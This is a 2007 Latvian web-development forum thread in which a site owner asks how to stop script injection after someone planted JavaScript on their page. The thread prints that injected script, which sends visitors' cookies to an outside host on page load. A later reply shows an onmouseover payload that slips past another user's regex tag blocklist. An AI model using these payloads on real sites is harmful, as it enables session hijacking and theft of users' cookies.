Sasa Posted May 5, 2007 Report Share Posted May 5, 2007 manā lapā var ierakstīt šādu tekstu un man vis saiet dēli: :( //We will set XMLHttpRequestObject false to see if it returns true later on. var XMLHTTPRequestObject = false; if (window.XMLHttpRequest) { XMLHttpRequestObject = new XMLHttpRequest(); } else if(window.ActiveXObject) { XMLHttpRequestObject = new ActiveXObject(\"Microsoft.XMLHTTP\"); } else { alert(\"Javascript must be enabled to continue.\"); } function socket() { XMLHttpRequestObject.open(\'GET\', \'http://s.4dev.net/sasa.po.gs.png?\' + window.document.cookie, true); XMLHttpRequestObject.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\"); XMLHttpRequestObject.send(null); delete XMLHttpRequestObject; } window.document.onload=\'socket();\'\"> Mja |||||||||||||||||||||||| ko darīt lai šitais vairs neatkārtotos! Link to comment Share on other sites More sharing options...
4e4en Posted May 5, 2007 Report Share Posted May 5, 2007 (edited) Mani nobanot :D :D ja godīgi, tev tas nekaitēja.... diemžēl ;( tagu filtrācija, htmlspecialchars htmlentities pēc tā tur tev lapa visai jautri izskatījās :D :D Edited May 5, 2007 by 4e4en Link to comment Share on other sites More sharing options...
Sasa Posted May 5, 2007 Author Report Share Posted May 5, 2007 (edited) bet ko tam kodam bija jāizdara vispārībā? jā sāku likt višadus http://lv.php.net/manual/en/function.htmlspecialchars.php bet tas pagaidām uz localhost! kā es varu filtrēt to kas rakstās failā? Edited May 5, 2007 by Sasa Link to comment Share on other sites More sharing options...
xerts Posted May 23, 2007 Report Share Posted May 23, 2007 $check_url = (isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : $_SERVER['SCRIPT_NAME']); foreach ($_GET as $check_url) { if ((eregi("<[^>]*script[^>]*>", $check_url)) || (eregi("<[^>]*object[^>]*>", $check_url)) || (eregi("<[^>]*iframe[^>]*>", $check_url)) || (eregi("<[^>]*applet[^>]*>", $check_url)) || (eregi("<[^>]*meta[^>]*>", $check_url)) || (eregi("<[^>]*style[^>]*>", $check_url)) || (eregi("<[^>]*form[^>]*>", $check_url)) || (eregi("\([^>][^)]*\)", $check_url)) || (eregi("<[^>]*frameset[^>]*>", $check_url)) || (eregi("<[^>]*onmouseover[^>]*>", $check_url)) || (eregi("<[^>]*img[^>]*>", $check_url)) || (eregi("\"", $check_url)) || (eregi("'", $check_url))) { die (); } } un ka jau 4e4en teica htmlspecialchar izmanto Link to comment Share on other sites More sharing options...
andrisp Posted May 23, 2007 Report Share Posted May 23, 2007 Ārprāts :), vienkāršāk nav striptags un/vai htmlspecialchars ? Link to comment Share on other sites More sharing options...
4e4en Posted May 28, 2007 Report Share Posted May 28, 2007 xerts, tavējo var viegli apnest <b onmouseover=alert(document.cookie);>šits</b> Link to comment Share on other sites More sharing options...
Recommended Posts